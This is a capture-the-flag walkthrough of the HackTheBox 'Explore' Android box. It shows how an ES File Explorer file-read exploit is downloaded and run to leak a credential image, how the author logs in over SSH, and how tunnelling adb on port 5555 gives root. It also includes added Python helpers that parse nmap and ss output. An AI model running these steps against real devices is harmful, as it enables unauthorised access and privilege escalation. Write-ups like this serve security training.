Explore HackTheBox WalkThrough

This is the walkthrough of the Explore HackTheBox machine. In this writeup I demonstrate step by step how I rooted it. Before starting, a few facts about the box: it runs the Android OS, its IP address is 10.10.10.247, and its maker rated its difficulty Easy.

First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Explore machine by pinging its IP 10.10.10.247. If all goes well, it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the various services running on different ports and sometimes helps with vulnerability assessment too. I used nmap for this task and the result is given below:

Scanning

$ sudo nmap -sT -T4 -sV -p- -oN explore-all-tcp.nmap --min-rate=1000 10.10.10.247
[Image: Nmap scan during Explore HackTheBox Walkthrough]

The full TCP port scan revealed 4 open ports: an SSH server on 2222, ES File Explorer on 42135, a Bukkit JSONAPI web server on 59777 and an unknown service on port 33483. A quick Google search for an ES File Explorer exploit revealed that ES File Explorer on Android is vulnerable to an arbitrary file read vulnerability. For more info about this vulnerability check this link. You can either use the previous link to download the exploit code or use this link; both are the same. Here is a snippet of the exploit.
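Scan results like the ones above are usually kept as the `-oN` ("normal") nmap output file named in the command. The following added example (my own code, not from the original walkthrough) parses that format into records and compares the open ports against a baseline of expected services, which is the same check an asset owner would run to spot an unexpected listener such as a file-manager web service on a phone. The sample scan text is constructed to mirror the four ports the walkthrough reports; the service and version columns are illustrative, not copied from the page.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample in nmap -oN format (not the walkthrough's real output).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.10.247
Host is up (0.11s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
33483/tcp open  unknown
42135/tcp open  http    ES File Explorer Name Response httpd
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version text>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text: str) -> List[Dict[str, object]]:
    """Return one record per port line in nmap normal (-oN) output."""
    records: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # headers, host lines and comments are skipped
        port, proto, state, service, version = m.groups()
        records.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        })
    return records


def open_ports(text: str) -> List[int]:
    """Ports nmap reports as open, in file order."""
    return [int(r["port"]) for r in parse_nmap_normal(text) if r["state"] == "open"]


def unexpected_listeners(text: str, allowed: Iterable[int]) -> List[int]:
    """Open ports that are not on the allowed baseline (a defender's drift check)."""
    allowed_set = set(allowed)
    return sorted(p for p in open_ports(text) if p not in allowed_set)


if __name__ == "__main__":
    # Baseline for a managed Android device that should only expose SSH on 2222.
    for rec in parse_nmap_normal(SAMPLE_NMAP):
        print(f"{rec['port']}/{rec['proto']} {rec['state']} {rec['service']} {rec['version']}")
    print("unexpected:", unexpected_listeners(SAMPLE_NMAP, allowed=[2222]))
```

Running the script prints the parsed port table and then `unexpected: [33483, 42135, 59777]`, i.e. every listener that the SSH-only baseline does not account for.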

[Image: ES Explorer exploit snippet from packetstorm.com]

Using this exploit I could read many files on the Explore machine. When I listed all the pictures on the Android phone, I found one named creds.jpg. Judging by its name, it may contain some kind of credential. I then tried to download this picture using the exploit itself, but it gave me the error "You need to provide full path of the file". After a few more failed attempts to download it, I tried to access the file through a web browser, and it could be accessed that way. Inside that picture there is a handwritten credential. I followed the steps given below to access the file.

Downloading & Executing Exploit

$ wget https://dl.packetstormsecurity.net/2106-exploits/esfileexplorer41974-fileread.txt
$ mv esfileexplorer41974-fileread.txt exploit.py
$ python3 exploit.py listPics 10.10.10.247
$ curl http://10.10.10.247:59777/storage/emulated/0/DCIM/creds.jpg -O
$ firefox creds.jpg
[Image: Downloading and executing the ES Explorer exploit during Explore HackTheBox Walkthrough]
[Image: creds.jpg captured during Explore HackTheBox Walkthrough]

The credential extracted from the file is kristi : Kr1sT!5h@Rp3xPl0r3!

Getting User Shell

Let us use the grabbed credential to log in to Kristi's SSH account.

$ ssh kristi@10.10.10.247 -p 2222
Password: Kr1sT!5h@Rp3xPl0r3!
$ whoami && id
[Image: Getting a shell as kristi in Explore HTB walkthrough]

We have successfully logged in to kristi's SSH account. Let us capture the user flag.

Capture User Flag

$ cat /sdcard/user.txt
[Image: Capturing the user flag during Explore HTB writeup]

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector. We can use a post-exploitation enumeration script for this task. Check this link if you need more information about post-exploitation tools.

Finding PrivEsc Vector

$ ss -lnpt

The command revealed that port 5555 is open and listening on the local address only.

[Image: Checking all the listening ports on the Explore machine]

Then I checked which process is running on this port and which user is executing it. If it is executed by root or some well-known user then we should definitely have a look at it. Generally, on Android, port 5555 is used by adb, so I checked the running processes and found that adb is being executed by the user shell.

$ ps -ef | grep -i adb
[Image: ps command output on the Explore machine during its walkthrough]

A quick Google search for adb privilege escalation gave this ppt. According to it we can perform privilege escalation only when we are logged in as the user shell. But currently we are logged in as user u0_a76. We have to somehow log in as user shell to perform privilege escalation. When I logged in as user shell, I could escalate privileges very easily. So here our potential PrivEsc vector is privilege escalation by exploiting adb [Android Debug Bridge].

Local Port Forwarding

Since the adbd service is listening only on the local address and running as user shell, we can reach it from our Kali machine by forwarding port 5555 to Kali over SSH. Therefore, to access adb I forwarded port 5555 to my Kali machine through local port forwarding. Now we can see the forwarded port on our Kali machine using the $ ss -lnpt command.
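The reason the tunnel is needed is the binding address: adbd is bound to 127.0.0.1, so it is unreachable from the network until SSH (which is bound to all interfaces) carries the traffic for it. The following added example (my own code, not from the original walkthrough) parses `ss -lnpt` style output and separates loopback-bound listeners from network-exposed ones. That is the audit a device owner would run to confirm which services are actually reachable from outside, and it also shows why the walkthrough's SSH tunnel was required for 5555 but not for 2222. The sample output is constructed: the adbd and sshd lines mirror the walkthrough's finding, the other lines are made up.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample modelled on `ss -lnpt` output (not the walkthrough's real output).
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       50      127.0.0.1:5555       0.0.0.0:*          users:(("adbd",pid=1234,fd=10))
LISTEN  0       128     0.0.0.0:2222         0.0.0.0:*          users:(("sshd",pid=4321,fd=3))
LISTEN  0       10      *:42135              *:*
LISTEN  0       10      [::]:59777           [::]:*
LISTEN  0       5       [::1]:33483          [::]:*
"""

# Extracts the process name from the `users:(("name",pid=...,fd=...))` column.
PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


def _split_addr_port(addr_port: str):
    """'[::1]:33483' -> ('::1', 33483); '127.0.0.1:5555' -> ('127.0.0.1', 5555)."""
    host, _, port = addr_port.rpartition(":")
    return host.strip("[]"), int(port)


def _scope(host: str) -> str:
    """Classify a bind address: 'any' (all interfaces), 'loopback', or 'specific'."""
    if host in ("*", "0.0.0.0", "::", ""):
        return "any"
    try:
        return "loopback" if ipaddress.ip_address(host).is_loopback else "specific"
    except ValueError:
        return "unknown"


def parse_ss(text: str) -> List[Dict[str, object]]:
    """One record per LISTEN row of `ss -lnpt` output."""
    rows: List[Dict[str, object]] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "LISTEN":
            continue  # skips the header line
        host, port = _split_addr_port(parts[3])
        m = PROCESS_RE.search(line)
        process: Optional[str] = m.group(1) if m else None
        rows.append({"host": host, "port": port, "scope": _scope(host), "process": process})
    return rows


def loopback_only(text: str) -> List[int]:
    """Ports reachable only from the device itself (or through a tunnel)."""
    return sorted(int(r["port"]) for r in parse_ss(text) if r["scope"] == "loopback")


def network_exposed(text: str) -> List[int]:
    """Ports bound to a routable or wildcard address, i.e. reachable over the network."""
    return sorted(int(r["port"]) for r in parse_ss(text) if r["scope"] in ("any", "specific"))


def forward_spec(remote_port: int, local_port: Optional[int] = None) -> str:
    """The `ssh -L` argument that maps a local port to a loopback-only service on the host."""
    local_port = remote_port if local_port is None else local_port
    return f"{local_port}:127.0.0.1:{remote_port}"


if __name__ == "__main__":
    for r in parse_ss(SAMPLE_SS):
        print(f"{r['port']:>6}  {r['scope']:<9} {r['host']:<10} {r['process'] or '-'}")
    print("loopback only :", loopback_only(SAMPLE_SS))
    print("network exposed:", network_exposed(SAMPLE_SS))
    print("tunnel for 5555: ssh -L", forward_spec(5555), "<user>@<host>")
```

On the constructed sample the loopback-only list is `[5555, 33483]` and the network-exposed list is `[2222, 42135, 59777]`; `forward_spec(5555)` yields the `5555:127.0.0.1:5555` argument used in the `ssh -L` command above. From a hardening point of view, the loopback-only list is the set of services that become reachable to anyone who obtains an SSH login, so an adb daemon in that list is worth disabling rather than relying on its bind address.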

$ ssh -L 5555:127.0.0.1:5555 kristi@10.10.10.247 -p 2222
Password: Kr1sT!5h@Rp3xPl0r3!
$ ss -lnpt
[Image: Local port forwarding in Explore HTB]

Getting Root Shell

Once we can access the adb service locally, we can easily connect to it and perform privilege escalation. To do so I followed the steps given below.

$ adb connect 127.0.0.1
$ adb devices
$ adb shell
$ su
# whoami && id
[Image: Getting a root shell during Explore HackTheBox Walkthrough]

We have successfully got a root shell. Let us capture the root flag.

Capture Root Flag

# find / -user "root" -type f -name "root.txt" 2>/dev/null
# cat /data/root.txt
[Image: Capturing the root flag in Explore HTB]

This is how I rooted the Explore HackTheBox machine. I learnt a lot from this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. For any query or suggestion about the walkthrough feel free to write to us at [email protected].

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/